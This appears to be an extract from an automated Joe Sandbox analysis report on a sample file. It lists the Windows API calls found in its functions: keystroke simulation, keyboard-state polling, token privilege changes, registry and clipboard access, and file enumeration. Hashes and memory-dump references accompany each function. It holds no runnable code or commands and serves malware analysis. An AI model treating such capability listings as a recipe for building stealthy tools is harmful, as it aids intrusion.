                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                              • IsIconic.USER32(?), ref: 0043D66E
                                                                              • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                              • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                              • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                              • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                              • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                              APIs
                                                                                • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                              • _memset.LIBCMT ref: 00458353
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                              • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                              • GetProcessWindowStation.USER32 ref: 004583E6
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 44150fea63d3621502c99f43e5308078f74b087076934076f4f29801822f52ed
                                                                              • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                              • Opcode Fuzzy Hash: 44150fea63d3621502c99f43e5308078f74b087076934076f4f29801822f52ed
                                                                              • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                              • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                              • __swprintf.LIBCMT ref: 0046C890
                                                                              • __swprintf.LIBCMT ref: 0046C8D3
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                              • __swprintf.LIBCMT ref: 0046C927
                                                                                • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                              • __swprintf.LIBCMT ref: 0046C975
                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                              • __swprintf.LIBCMT ref: 0046C9C4
                                                                              • __swprintf.LIBCMT ref: 0046CA13
                                                                              • __swprintf.LIBCMT ref: 0046CA62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 3953360268-2428617273
                                                                              • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                              • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                              • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                              • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046EFB6
                                                                              • _wcscmp.LIBCMT ref: 0046EFCB
                                                                              • _wcscmp.LIBCMT ref: 0046EFE2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                              • _wcscmp.LIBCMT ref: 0046F074
                                                                              • _wcscmp.LIBCMT ref: 0046F08B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                              • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                              • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                              • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: f7fe398b0a6251fe003052b783ea5a901d9b04f0cf4847914aaf135240fa48bd
                                                                              • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                              • Opcode Fuzzy Hash: f7fe398b0a6251fe003052b783ea5a901d9b04f0cf4847914aaf135240fa48bd
                                                                              • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                              • API String ID: 0-559809668
                                                                              • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                              • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                              • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                              • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046F113
                                                                              • _wcscmp.LIBCMT ref: 0046F128
                                                                              • _wcscmp.LIBCMT ref: 0046F13F
                                                                                • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                              • _wcscmp.LIBCMT ref: 0046F1BC
                                                                              • _wcscmp.LIBCMT ref: 0046F1D3
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                              • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                              • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                              • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                              • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                              • __swprintf.LIBCMT ref: 0046A231
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                              • _memset.LIBCMT ref: 0046A2B2
                                                                              • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                              • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                              • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                              • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
APIs
• GetKeyboardState.USER32(?), ref: 00460097
• SetKeyboardState.USER32(?), ref: 00460102
• GetAsyncKeyState.USER32(000000A0), ref: 00460122
• GetKeyState.USER32(000000A0), ref: 00460139
• GetAsyncKeyState.USER32(000000A1), ref: 00460168
• GetKeyState.USER32(000000A1), ref: 00460179
• GetAsyncKeyState.USER32(00000011), ref: 004601A5
• GetKeyState.USER32(00000011), ref: 004601B3
• GetAsyncKeyState.USER32(00000012), ref: 004601DC
• GetKeyState.USER32(00000012), ref: 004601EA
• GetAsyncKeyState.USER32(0000005B), ref: 00460213
• GetKeyState.USER32(0000005B), ref: 00460221
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
• Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
• Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
• Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
APIs
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
• RegCloseKey.ADVAPI32(00000000), ref: 0048082F
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 35491d877236a63b1427915f2f37c1e8b310e57b8b745a6dccbb1f539d16618d
• Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
• Opcode Fuzzy Hash: 35491d877236a63b1427915f2f37c1e8b310e57b8b745a6dccbb1f539d16618d
• Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
APIs
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
• Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
• Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
• Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
• Sleep.KERNEL32(0000000A), ref: 0046F470
• _wcscmp.LIBCMT ref: 0046F484
• _wcscmp.LIBCMT ref: 0046F49F
• FindNextFileW.KERNEL32(?,?), ref: 0046F53D
• FindClose.KERNEL32(00000000), ref: 0046F553
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
• Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
• Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
• Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
• Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
